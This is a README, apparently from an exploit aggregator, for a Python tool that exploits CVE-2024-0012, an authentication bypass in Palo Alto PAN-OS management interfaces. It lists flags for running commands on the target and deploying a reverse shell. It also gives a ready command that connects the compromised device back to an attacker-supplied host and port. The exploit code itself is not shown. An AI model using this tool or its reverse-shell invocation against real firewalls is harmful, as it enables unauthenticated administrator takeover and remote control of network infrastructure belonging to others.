## https://sploitus.com/exploit?id=DAD6DD2C-0F2B-5059-B512-35E636A352D4
[![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/)
# CVE-2024-0012
CVE-2024-0012 an authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities.
# Screenshot
![cve-2024-0012](https://github.com/user-attachments/assets/0b01442b-e8f8-4327-8a21-886f16872311)
| :exclamation: **Disclaimer** |
|---------------------------------|
| This project is primarily built to be used as a standalone CLI tool. **Running this exploit as a service may pose security risks.** It's recommended to use with caution and additional security measures. DWYOR |
# Usage
```
python3 cve-2024-0012.py -h
```
This will display help for the tool. Here are all the switches it supports.
```yaml
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help show this help message and exit
--url URL Target base URL (http:// or https://)
--no-verify Disable SSL verification
--timeout TIMEOUT Request timeout in seconds
--command COMMAND Command to execute on the target
--reverse-shell Deploy a reverse shell to the target
--lhost LHOST Local host for reverse shell connection (required for reverse shell)
--lport LPORT Local port for reverse shell connection (required for reverse shell)
```
Reverse Shell Command.
```
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444
```
- Replace 4444 with the port you are using.
# Credits
- [Chirag Artani](https://3rag.com/ )
- [Sachin Artani](https://github.com/Sachinart/ )
- [Muhammad Mugni Abdul Gani](https://www.instagram.com/mtwo7.id/)